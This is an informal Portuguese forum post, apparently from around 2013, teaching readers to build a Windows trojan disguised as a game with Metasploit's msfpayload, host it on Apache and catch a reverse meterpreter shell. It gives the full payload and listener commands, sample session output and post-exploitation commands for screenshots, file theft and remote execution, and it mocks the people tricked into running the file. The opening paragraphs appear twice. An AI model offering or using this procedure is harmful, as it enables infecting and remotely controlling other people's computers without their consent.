E aew galera fiz um video aqui mostrando como criar Trojans com o metasploit
Bom aumentei a velocidade do video em 2,75 vezes intão ficou meio rapido mas da para intender
aqui ta o link do video mas vou explicar como fazer la em baixo tbm pq o video teve varios erros
APesar do video vou explicar por aqui tbm nós vamos criar o trojan e ja vamos joga-lo direto na pasta do apache
Primeiro só relembrando pra vcs que caso estejam utilizando alguma maquina virtual ela tem que estar configurada em modo bridge
Caso ja tenha o metasploit instalado na sua maquina vamos começar
Lembre de nao confundir seu ip antes de ifconfig no teminal para ver depois abra outro e vamos iniciar
Com isso iriamos criar o trojan fazendo a conexão reversa para o ip 192.168.7.14 na porta 4444 e jogariamos o trojan na pasta /var/www como o arquivo jogo.exe, jogando o trojan na pasta /var/www ja facilita muita coisa pois podemos ja iniciar o apache e o trojan ja estaria la pronto pra algum burro fazer o download.
Mas antes de fazer tudo isso não é apenas a pessoa clicar vc tem que preparar a ratoera antes de pegar o rato intão vamos deixar o metasploit de escuta na porta 4444 onde colocamos o trojan com os seguintes comandos
Pronto agora esta tudo armado vamos ligar o apache e mandar o trojan pra alguem
primeiro ligue o apache com o comando
Pronto seu apache ta ligado o metasploit está de esculta agora é simplesmente fazer a pessoa baixar o arquivo pelo seguinte link
seu ip/nome do arquivo de virus
Exemplo:192.168.7.14/jogo.exe
Com isso tudo pronto agora vc enviara o trojan para alguem suponhamos que ele aceite e execute o trojan no mesmo momento va no metasploit estara algo semelhante a isso:
Com isso esta tudo pronto o computador ja fez a conexao reversa com o seu pc e vc ja pode executar comandos remotos no computador
Bom aqui vou mostrar alguns comandos:
Bom aumentei a velocidade do video em 2,75 vezes intão ficou meio rapido mas da para intender
aqui ta o link do video mas vou explicar como fazer la em baixo tbm pq o video teve varios erros
APesar do video vou explicar por aqui tbm nós vamos criar o trojan e ja vamos joga-lo direto na pasta do apache
Primeiro só relembrando pra vcs que caso estejam utilizando alguma maquina virtual ela tem que estar configurada em modo bridge
Caso ja tenha o metasploit instalado na sua maquina vamos começar
Lembre de nao confundir seu ip antes de ifconfig no teminal para ver depois abra outro e vamos iniciar
Um exemplo de como pode ficar o comandomsfpayload windows/meterpreter/reverse_tcp LHOST=seu ip LPORT=porta onde vai receber X> pasta onde vai ir o trojan/trojan.exe
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.7.14 LPORT=4444 X>/var/www/jogo.exe
Com isso iriamos criar o trojan fazendo a conexão reversa para o ip 192.168.7.14 na porta 4444 e jogariamos o trojan na pasta /var/www como o arquivo jogo.exe, jogando o trojan na pasta /var/www ja facilita muita coisa pois podemos ja iniciar o apache e o trojan ja estaria la pronto pra algum burro fazer o download.
Mas antes de fazer tudo isso não é apenas a pessoa clicar vc tem que preparar a ratoera antes de pegar o rato intão vamos deixar o metasploit de escuta na porta 4444 onde colocamos o trojan com os seguintes comandos
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST=o ip q vc pos antes
set LPORT=a porta q vc pos antes
exploit
Pronto agora esta tudo armado vamos ligar o apache e mandar o trojan pra alguem
primeiro ligue o apache com o comando
/etc/init.d/apache2 start
Pronto seu apache ta ligado o metasploit está de esculta agora é simplesmente fazer a pessoa baixar o arquivo pelo seguinte link
seu ip/nome do arquivo de virus
Exemplo:192.168.7.14/jogo.exe
Com isso tudo pronto agora vc enviara o trojan para alguem suponhamos que ele aceite e execute o trojan no mesmo momento va no metasploit estara algo semelhante a isso:
Started reverse handler on 192.168.7.14:4444...
Sending the payload Handler....
Sendind Stage (75281 bytes) to 192.168.1.46
Meterpreter session 1 opened (192.168.7.14:4444 -> 192.168.1.46:1101) at 2013-02-15 20:43
meterpreter>
Com isso esta tudo pronto o computador ja fez a conexao reversa com o seu pc e vc ja pode executar comandos remotos no computador
Bom aqui vou mostrar alguns comandos:
Bom galera isso ai foi o basico espero que tenham gostado vlw!!!
Help - Mostra todos os comandos
cd - muda a pasta
ls - ve os arquivos da pásta atual
screenshot- tira um print screen da tela do alvo e te manda
cat - pega arquivos exemplo: cat /etc/passwd obviamente isso no windows nao vai funcionar
shutdown - desliga o computador
shell- tenta simular uma shell no sistema
ps- mostra processos ativos
kill - mata processos
pwd - mostra a pasta atual
reboot - reinicia o computador
execute - executa um programa no computador remoto